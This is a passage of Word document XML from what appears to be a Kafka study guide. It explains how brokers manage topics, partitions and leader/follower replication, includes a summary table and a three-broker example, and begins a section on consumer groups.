        <w:t xml:space="preserve"> for fault tolerance and high availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F040B4C" w14:textId="77777777" w:rsidR="007F0DBD"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54CC3E">
          <v:rect id="_x0000_i3126" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79322D4F" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Role in Managing Topics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15013393" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1313"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka is a logical stream of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A245C40" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1313"/>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Kafka Broker manages </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metadata and storage</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF3F8E4" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1313"/>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Each </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic is divided into partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and partitions are spread across brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9FFD0D" w14:textId="77777777" w:rsidR="007F0DBD"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82C1EB8">
          <v:rect id="_x0000_i3127" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB945F" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Role in Managing Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4037C047" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>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Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow Kafka to scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D82D60" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>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Each partition is </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hosted on one broker</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the leader), while others replicate it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41517D96" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>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Kafka Broker handles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4BC8CB" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1314"/>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Read/write operations</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for partitions where it is the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6303C3" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1314"/>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Replication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from other brokers where it is a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D943EF6" w14:textId="77777777" w:rsidR="007F0DBD"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FA35B87">
          <v:rect id="_x0000_i3128" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40253B" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Role in Message Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E1154F" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1315"/>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Kafka ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high availability</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FB5F7A" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1315"/>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Each partition has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8A94C0" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1315"/>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Leader replica</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (handles all I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387963E4" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1315"/>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Follower replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (synchronize with the leader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F9E903" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1315"/>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Brokers </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>coordinate replication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ensuring data is safely stored across nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CE0FF" w14:textId="77777777" w:rsidR="007F0DBD"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FB05FD">
          <v:rect id="_x0000_i3129" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D00665B" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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3"/>
        <w:gridCol w:w="5342"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="4E61527B" w14:textId="77777777" w:rsidTr="007F0DBD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1363BB74" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="741B177F" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Broker’s Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="5EDF7A75" w14:textId="77777777" w:rsidTr="007F0DBD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06A60F88" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BAE7587" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Manages topic metadata and partition assignments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="47CF0ECD" w14:textId="77777777" w:rsidTr="007F0DBD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E69C01B" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Partitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79FBB155" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Stores data, performs leader/follower duties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="74BC66B6" w14:textId="77777777" w:rsidTr="007F0DBD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D77B14D" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23D9C738" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Handles synchronization of partition data between brokers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="41AB4410" w14:textId="77777777" w:rsidTr="007F0DBD">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ABD5D3C" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Producers/Consumers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DAEB038" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Acts as interface for sending and receiving messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="625EECFB" w14:textId="77777777" w:rsidR="007F0DBD"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1217A60">
          <v:rect id="_x0000_i3130" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB64AD9" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626255B9" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD"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In a Kafka cluster with 3 brokers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F93D0" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1316"/>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Topic orders has 6 partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46568B32" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="008E5BA7" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1316"/>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Partition orders-0 could be </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>led by Broker 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, with replicas on Broker 2 and 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0126E817" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="00CE4B95" w:rsidRDefault="007F0DBD" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1316"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Broker 1 manages all writes and reads for orders-0, and ensures data is </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replicated</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Brokers 2 and 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2758C" w14:textId="77777777" w:rsidR="007F0DBD" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007F0DB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C6088F2">
          <v:rect id="_x0000_i3131" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD4134" w14:textId="26219333" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC6AFF" w:rsidP="007C61B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="776" w:name="_Toc196308256"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Kafka Consumer Group</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="776"/>
    </w:p>
    <w:p w14:paraId="07189F33" w14:textId="640EAD7A" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Consumer Group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a fundamental concept in Apache Kafka that allows </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scaling and fault-tolerant consumption of messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0214C" w14:textId="77777777" w:rsidR="00CC2805"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66E9E63">
          <v:rect id="_x0000_i3132" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="582A3C2C" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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What is a Kafka Consumer Group?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67533C79"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer Group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>group of consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., Kafka clients) that </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>work together to consume data from a topic</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F43DBA6"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Each consumer in the group </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
